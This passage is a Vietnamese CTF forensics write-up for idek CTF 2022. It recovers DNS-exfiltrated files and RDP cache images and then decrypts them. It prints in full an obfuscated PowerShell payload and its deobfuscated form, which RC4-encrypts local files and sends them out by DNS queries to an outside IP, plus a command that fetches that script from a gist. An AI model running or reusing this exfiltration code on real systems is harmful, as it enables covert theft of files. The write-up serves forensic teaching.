&& ip.dst == 192.168.209.134 && dns.id == 0x0002" > b64.txt ``` ``` *[b64.txt] BlbffYc+Hkh49X1cpMtmWdjHkyUUO6vcK8zI9MoUG9Hvmj51555pTLCcB.1SpMylD3EY7zxxYe899sBKMsNVhM13d88UIHh6o5+XZmUWEAum45BcycL.nrBEhPOrD2BAWWIlP/XW3YGtKt/AT3oMUe6PLVSMNk6NMlML9Mv6gJL5V.QOQtA2liDIB9rktpzthM1TcnOutJ/tRpOzvq2+BpC2yDWX6hkjLlxYSAl.ZGVzLnR4dA== Zn0k1QToW3wbbJwXfaARrOueL6zA+sBeQEt7rqfXbfbPtkxFVgBB6EXaY.ZQmIsBCURLMpyHB4UT3e9tDrunN+c9n19WiONc8BODE2OeusLxHI4pATX.LhbdSWq/rqnuX9Ffx4f687nGW2N4m0C0RwmH7j7kr7Jzz5kWQfwkQh/RY.4DByKRDxZJ3hVWXrsEQoznPgVj1HCTcxd1PazSMvZp1SI3pg6riPPl87u.ZGVzLnR4dA== xkHuwe3bR3a8F09NdIbEdGeyQEzy00YCv8hZ0dSNCLm3j7B76SyW4edVq.kPnAikp46rtZjVB6tm2l4RHT8yGNKtctiak5aGsuuTOFRLXztepvl48xc.KJU5aba/vHBMtHJOMsipzYYNPsRqucEJU7igdSvd8453y1pwE9CV2KqZY.vA8WfOGk6Ab8IC5HDIx8Q9rtKrFpeFlLVH6s+LZcV/3hQyg8PRKaw6WZ0.ZGVzLnR4dA== ............................ ``` + Ban đầu ném cả file vào cyberchef để decode thì không nhận được gì nên mình phân nhỏ nó ra và để dòng mã cuối của từng dòng thì phát  + Code extract những dòng đó ra xong mình nhận được nội dung sau : ``` from base64 import b64decode Dict = {} lines = open("b64.txt", "r").readlines() for x in lines: key = b64decode(x.strip().split(".")[-1]) Dict[key] = Dict.get(key, 0) + 1 print(Dict) ```  ``` {b'des.txt': 4, b'KCSC.jpg': 421, b'readme.txt': 8, b'readme2.txt': 6, b'SecretPlan.pdf': 1329, b'update.ps1': 58, b'vov.txt': 4, b'zoneblue.jpg': 159} ``` + Ở đây thì mình quan tâm đến 2 file đó là SecretPlan.pdf và update.ps1 + Nhưng vẫn không biết nó ở đâu. + Thế là bây giờ DNS đã hết hope nên chuyển sang RDP để phân tích tiếp. + `RDP (Remote Desktop Protocol) là một giao thức được Microsoft phát triển để cho phép người dùng kết nối và điều khiển từ xa các máy tính chạy hệ điều hành Windows.` + Và máu chốt nằm ở những file cache nó là các tệp lưu trữ dữ liệu tạm thời được tạo ra để cải thiện hiệu suất của một ứng dụng nào đó. Trong trường hợp của RDP, các tệp cache có thể liên quan đến việc lưu trữ dữ liệu tạm thời liên quan đến phiên kết nối từ xa. Các tệp cache có thể chứa thông tin như hình ảnh, fonts, hay dữ liệu khác để giảm độ trễ trong quá trình truyền tải giữa máy tính nguồn và máy tính đích. + Mình tiếp tục dùng FTK Imager để tìm kiếm các file cache trong file hard disk image ban đầu. + Và theo đường dẫn `C:\Users\IEUser\AppData\Local\Microsoft\Terminal Server Client\Cache\`, mình thấy được 3 file cache.  + Dùng tool [BMC](https://github.com/ANSSI-FR/bmc-tools) để phân tích mấy file cache như này. + Sử dụng cmd trên win để thực thi lệnh ``` $python bmc-tools.py -s "C:\Users\ASUS\Downloads\1\idek ctf 2022\Cache0000.bin" -d ./0 $python bmc-tools.py -s "C:\Users\ASUS\Downloads\1\idek ctf 2022\Cache0001.bin" -d ./1 $python bmc-tools.py -s "C:\Users\ASUS\Downloads\1\idek ctf 2022\Cache0002.bin" -d ./2 ```  + Đến đây thì ghép các ảnh(ghép ngược) trong folder 2 lại thì mình nhận 1 URL :  + => `Start-BitsTransfer Source https://gist.githubusercontent.com/bquanman/cb6a4b2420d9f3d2f27287dcb46661d6/raw/5c30ba3542b952e2be68491c825f0145ed0da14e/update.ps1 -Destination “C:\Users\Administrator\Documents\Work\CONFIDENTAL\Project Bluezone` + Cách 2 mở 3 file bằng `bitmapcacheviewer.exe`  + Sau khi mở đường link kia xem thì mình nhận được 1 lệnh ps : ``` &( $EnV:COmsPEC[4,15,25]-JoiN'')( new-oBJeCt io.STREaMrEADEr(( new-oBJeCt io.cOMpreSsIoN.DeflaTestREAM( [IO.MEmoryStreAm] [sYStEm.ConVeRT]::FROMBase64stRiNG('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') ,[system.iO.coMPressIoN.CoMpressIonMODe]::DecoMPREsS)) , [TExT.EncoDINg]::ascII) ).REaDtOeNd( ) ``` + Đến đây thì có thể làm 2 cách : 1. Decode b64 + raw inflate xong chạy ps với `echo` (2 lần) 2. Dùng powerdecode để chạy + Ở đây mình dùng C2 cho tiện :  * [File đã deobf](https://github.com/KMANVK/idek-ctf-2022/blob/main/HiddenGem%20Mixtape%203%20The%20Ultimate%20Goal/PowerDecode_report_0ce0bf4f-06f1-4177-b10c-ff5b8af3dac0.txt) + Sau khi deobf xong thì mình nhận được đoạn code gốc là : ``` $d = "172.21.20.96" $s = 4 $b = 57 Get-ChildItem "." | ForEach-Object { $a = [System.Convert]::ToBase64String($Enc.GetBytes($_.Name)) $R = { $D, $K = $Args $S = 0..255 0..255 | ForEach-Object { $J = ($J + $S[$_] + $K[$_ % $K.Length]) % 256 $S[$_], $S[$J] = $S[$J], $S[$_] } $D | ForEach-Object { $I = ($I + 1) % 256 $H = ($H + $S[$I]) % 256 $S[$I], $S[$H] = $S[$H], $S[$I] $_ -bxor $S[($S[$I] + $S[$H]) % 256] } } $Enc = [System.Text.Encoding]::ASCII $p = $Enc.GetBytes('[System.IO.File]::ReadAllBytes($_.FullName)') $z = $Enc.GetBytes([System.IO.File]::ReadAllBytes($_.FullName)) $u = (& $R $z $p) $e = [System.Convert]::ToBase64String($u) $l = $e.Length $r = "" $n = 0 while ($n -le ($l / $b)) { $c = $b if (($n * $b) + $c -gt $l) { $c = $l - ($n * $b) } $r += $e.Substring($n * $b, $c) + "." if (($n % $s) -eq ($s - 1)) { nslookup -type=A "$r$a.$d" $r = "" } $n = $n + 1 } nslookup -type=A "$r$a.$d" } ``` + Phân tích nó 1 chút : ``` + Khởi tạo Biến: $d = "172.21.20.96" $s = 4 $b = 57 $d là một địa chỉ IP cụ thể. $s và $b là các tham số được sử dụng trong quá trình xử lý dữ liệu. + Hàm RC4 Encryption: $R = { # ... } + Đây là một hàm thực hiện thuật toán RC4 để mã hóa dữ liệu. Hàm này nhận vào một chuỗi $D và một khóa $K, sau đó trả về dữ liệu đã được mã hóa. + Xử Lý Tệp Tin: Get-ChildItem "." | ForEach-Object { # ... } Vòng lặp này xử lý từng tệp tin trong thư mục hiện tại. + Hàm encrypt và key : $Enc = [System.Text.Encoding]::ASCII $p = $Enc.GetBytes('[System.IO.File]::ReadAllBytes($_.FullName)') $z = $Enc.GetBytes([System.IO.File]::ReadAllBytes($_.FullName)) $u = (& $R $z $p) + $p = $Enc.GetBytes('[System.IO.File]::ReadAllBytes($_.FullName)'): Dòng này chuyển đổi chuỗi biểu diễn của lệnh PowerShell thành một mảng byte. Lệnh này chính là mã đọc tất cả byte từ tệp hiện tại ($_.FullName). + $z = $Enc.GetBytes([System.IO.File]::ReadAllBytes($_.FullName)): Dòng này đọc nội dung thực tế của tệp ($_.FullName) và chuyển đổi nó thành một mảng byte. + $u = (& $R $z $p): Hàm mã hóa $R được gọi với nội dung của tệp ($z) và khóa ($p). Kết quả được lưu trữ trong $u. + Mã Hóa và Gửi Truy Vấn DNS: while ($n -le ($l / $b)) { # ... } + Vòng lặp này chia nhỏ dữ liệu mã hóa thành các phần có kích thước $b và gửi các truy vấn DNS cho từng phần. + Mỗi $s lần lặp, nó sẽ gửi một truy vấn DNS bằng cách sử dụng nslookup. + Sử Dụng nslookup để Gửi Truy Vấn DNS: nslookup -type=A "$r$a.$d" => Sử dụng nslookup để gửi truy vấn DNS với một địa chỉ IP và tên miền được tạo ra từ dữ liệu đã được mã hóa. Đoạn mã này có vẻ liên quan đến việc chia nhỏ dữ liệu, mã hóa nó sử dụng thuật toán RC4, sau đó gửi truy vấn DNS để truyền dữ liệu đã mã hóa tới một địa chỉ IP cụ thể. Điều này có thể là một cách để thực hiện việc truyền thông giữa máy tính và một máy chủ bằng cách sử dụng DNS, có thể để bypass các giám sát mạng hoặc để thực hiện các hoạt động độc hại. Điều này cũng có thể là một ví dụ về kỹ thuật "DNS tunneling". ``` + Đến đây thì viết kịch bản giải mã đoạn b64 của DNS kia. + Ở đây cấu trúc của nó là `$r$a.$d` + Với `$r` và `$a` là đoạn mã bị mã hóa RC4 còn `$d` chính là đoạn mà mình lúc nãy là decode ra trước đó là : `{b'des.txt': 4, b'KCSC.jpg': 421, b'readme.txt': 8, b'readme2.txt': 6, b'SecretPlan.pdf': 1329, b'update.ps1': 58, b'vov.txt': 4, b'zoneblue.jpg': 159}` + Ví dụ : ``` A1ffdIcmCEFp9W1NoM9mXNPVhyIFP7jNK8zI9s0FCdftmj918IdsXLSOF.VOuMylDxFIz3h5Iasx+sBeFpsZiIl3M89QABg+o4fPImEGEAOy46x8yeL.7rAU5aLbfmBBWWMlLuXn/JE9at/ATzoMUf7vLSQ8Nm68UxOK9NrLELOoR.UPgtG2FiDIAt/lMp1pgI0RdzfutBnpBpK2Om16BpS2jHTT6p2nbxwYSYl.U2VjcmV0UGxhbi5wZGY= ``` + $r = A1ffdIcmCEFp9W1NoM9mXNPVhyIFP7jNK8zI9s0FCdftmj918IdsXLSOF.VOuMylDxFIz3h5Iasx+sBeFpsZiIl3M89QABg+o4fPImEGEAOy46x8yeL + $a = 7rAU5aLbfmBBWWMlLuXn/JE9at/ATzoMUf7vLSQ8Nm68UxOK9NrLELOoR.UPgtG2FiDIAt/lMp1pgI0RdzfutBnpBpK2Om16BpS2jHTT6p2nbxwYSYl + $d = U2VjcmV0UGxhbi5wZGY= + Và key chính là `$p` == `[System.IO.File]::ReadAllBytes($_.FullName)`  + Đến đây thì vào việc code decrypt RC4 xong decode b64 : ``` from base64 import b64decode from Crypto.Cipher import ARC4 from Crypto.Util.number import long_to_bytes def rc4_decrypt(data, key1): data = b64decode(data) key = bytes(key1, encoding='utf-8') enc = ARC4.new(key) res = enc.decrypt(data) return res Dict = {} lines = open("3.txt", "r").readlines() for x in lines: key = b64decode(x.strip().split(".")[-1]).decode() Dict[key] = Dict.get(key, 0) + 1 print(Dict) flag = 0 for key, value in zip(Dict.keys(), Dict.values()): temp = "" for i in range(value): temp += "".join(lines[flag].split(".")[:-1]) flag += 1 Dict[key] = temp Rc4Key = '[System.IO.File]::ReadAllBytes($_.FullName)' for key, value in zip(Dict.keys(), Dict.values()): try: open(key, "wb").write( b"".join(long_to_bytes(int(x)) for x in rc4_decrypt(value, Rc4Key).split(b" "))) print(key + " write success!") except: pass ``` + Chạy xong nhận được 8 file kia và mở file `SecretPlan.pdf` thì nhận được link pastebin dẫn đến flag.    ## HiddenGem Mixtape 2: Credential Access ### Des :  ### Sol :